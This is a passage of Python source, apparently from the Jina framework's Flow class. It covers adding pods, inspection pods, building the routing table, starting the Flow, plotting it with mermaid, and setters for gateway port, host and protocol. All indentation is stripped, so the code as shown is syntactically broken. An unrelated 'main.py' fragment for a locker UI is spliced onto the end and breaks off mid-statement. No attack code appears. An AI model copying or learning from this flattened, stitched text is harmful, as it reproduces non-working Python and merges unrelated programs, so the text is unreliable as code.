- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the following:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used in Python, one can additionally use the following values:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered the local host path and the second part the path inside the container.
- If no split is provided, then the basename of that directory will be mounted into the container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attributes of the Pod can later be changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify the Flow in place
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
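A minimal usage sketch; the Pod names below are purely illustrative and no `uses` is given, so the default Executor is used:
.. highlight:: python
.. code-block:: python
f = Flow().add(name='pod_a').add(name='pod_b', needs='gateway').add(needs=['pod_a', 'pod_b'])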
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
args.zmq_identity = None
# BACKWARDS COMPATIBILITY:
# We assume that this is used in a search Flow if replicas and shards are used
# Thus the polling type should be all
# But dont override any user provided polling
if args.replicas > 1 and args.shards > 1 and 'polling' not in kwargs:
args.polling = PollingType.ALL
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
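A minimal sketch of plugging an inspection Pod in; ``MyEvaluator`` is a hypothetical Executor used only for illustration:
.. highlight:: python
.. code-block:: python
f = Flow().add(name='encoder').inspect(uses='MyEvaluator')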
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: whether to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
# TODO needs to be refactored - deployment should not be a dictionary. Related Ticket:
# https://github.com/jina-ai/jina/issues/3280
def _get_routing_table(self) -> RoutingTable:
graph = RoutingTable()
for pod_id, pod in self._pod_nodes.items():
if pod_id == GATEWAY_NAME:
deployment = pod.deployments[0]
graph.add_pod(
f'start-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
graph.add_pod(
f'end-{GATEWAY_NAME}',
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
else:
for deployment in pod.deployments:
graph.add_pod(
deployment['name'],
deployment['head_host'],
deployment['head_port_in'],
deployment['tail_port_out'],
deployment['head_zmq_identity'],
)
for end, pod in self._pod_nodes.items():
if end == GATEWAY_NAME:
end = f'end-{GATEWAY_NAME}'
if pod.head_args.hosts_in_connect is None:
pod.head_args.hosts_in_connect = []
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
if end not in graph.pods:
end = end + '_head'
if isinstance(pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
end = kubernetes_deployment.to_dns_name(end)
for start in pod.needs:
start_pod = self._pod_nodes[start]
if start == GATEWAY_NAME:
start = f'start-{GATEWAY_NAME}'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
if start not in graph.pods:
start = start + '_tail'
if isinstance(start_pod, K8sPod):
from ..peapods.pods.k8slib import kubernetes_deployment
start = kubernetes_deployment.to_dns_name(start)
start_pod = graph._get_target_pod(start)
if pod.connect_to_predecessor or is_remote_local_connection(
start_pod.host, pod.head_host
):
pod.head_args.hosts_in_connect.append(
graph._get_target_pod(start).full_out_address
)
graph.add_edge(start, end, True)
else:
graph.add_edge(start, end)
# In case of sharding, the head and the tail pea have to be connected to the shards
for end, pod in self._pod_nodes.items():
if len(pod.deployments) > 0:
deployments = pod.deployments
for deployment in deployments[1:-1]:
graph.add_edge(deployments[0]['name'], deployment['name'])
graph.add_edge(deployment['name'], deployments[-1]['name'])
graph.active_pod = f'start-{GATEWAY_NAME}'
return graph
def _set_initial_dynamic_routing_table(self):
routing_table = self._get_routing_table()
if not routing_table.is_acyclic():
raise RoutingTableCyclicError(
'The routing graph has a cycle. This would result in an infinite loop. Fix your Flow setup.'
)
for pod in self._pod_nodes:
routing_table_copy = RoutingTable()
routing_table_copy.proto.CopyFrom(routing_table.proto)
self._pod_nodes[
pod
].args.static_routing_table = self.args.static_routing_table
# The gateway always needs the routing table to be set
if pod == GATEWAY_NAME:
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# For other pods we only set it if we are told do so
elif self.args.static_routing_table:
routing_table_copy.active_pod = pod
self._pod_nodes[pod].args.routing_table = routing_table_copy.json()
# dynamic routing does not apply to shards in a CompoundPod, only its tail
if not isinstance(self._pod_nodes[pod], CompoundPod):
self._pod_nodes[pod].update_pea_args()
else:
self._pod_nodes[pod].tail_args.routing_table = self._pod_nodes[
pod
].args.routing_table
self._pod_nodes[
pod
].tail_args.static_routing_table = self.args.static_routing_table
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify the Flow in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(needs={op_flow.last_pod})
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
op_flow._pod_nodes = {
k: v for k, v in op_flow._pod_nodes.items() if not v.role.is_inspect
}
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
op_flow._set_initial_dynamic_routing_table()
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# not clear why, but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.BasePea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted because {error_pods} could not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided, it will create a jpg image with that name;
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow before plotting so that the gateway connection can be shown more accurately
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and
return it; otherwise, modify the Flow in place
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
# _mermaid_str emits a 'flowchart LR' header (see above), so switch the direction keyword on that header
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL that points to an SVG image. It needs an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url that points to the rendered image
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new host to set
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that, once set, will return control
to the main thread.
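A typical serving sketch; the port and protocol values are illustrative:
.. highlight:: python
.. code-block:: python
f = Flow(protocol='http', port_expose=12345).add()
with f:
    f.block()  # serve until KeyboardInterrupt or until the stop event is set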
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
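A short sketch of switching the protocol; the value may be given as a string or a :class:`GatewayProtocolType`:
.. highlight:: python
.. code-block:: python
f = Flow(protocol='grpc')
f.protocol = 'http'  # equivalent to f.protocol = GatewayProtocolType.HTTP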
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
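A hedged sketch of exposing a custom endpoint when the Flow serves HTTP; the endpoint name is illustrative:
.. highlight:: python
.. code-block:: python
f = Flow(protocol='http')
f.expose_endpoint('/foo', summary='expose the `/foo` endpoint', methods=['POST'])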
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** this function previously accepted ``dump_path`` as the only overridable argument
:param uses_with: a Dictionary of arguments to restart the executor with
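A sketch of hot-swapping the replicas of one Pod while the Flow is running; the pod name and arguments are illustrative:
.. highlight:: python
.. code-block:: python
with f:
    f.rolling_update('encoder', uses_with={'model_path': '/tmp/new_model'})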
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
main.py
|
if __name__ == "__main__":
from time import sleep
import json
from multiprocessing import *
from src import ui
from src.utils import sensor_listener, locker_state
LCKMngKey = ""
procs = []
app = ui.App()
proc1 = Process(target=app.mainloop, args=())
procs.append(proc1)
proc1.start()
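# wait until the UI process has written the locker manager key to data/information.json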
while not LCKMngKey:
try:
with open("data/information.json") as f:
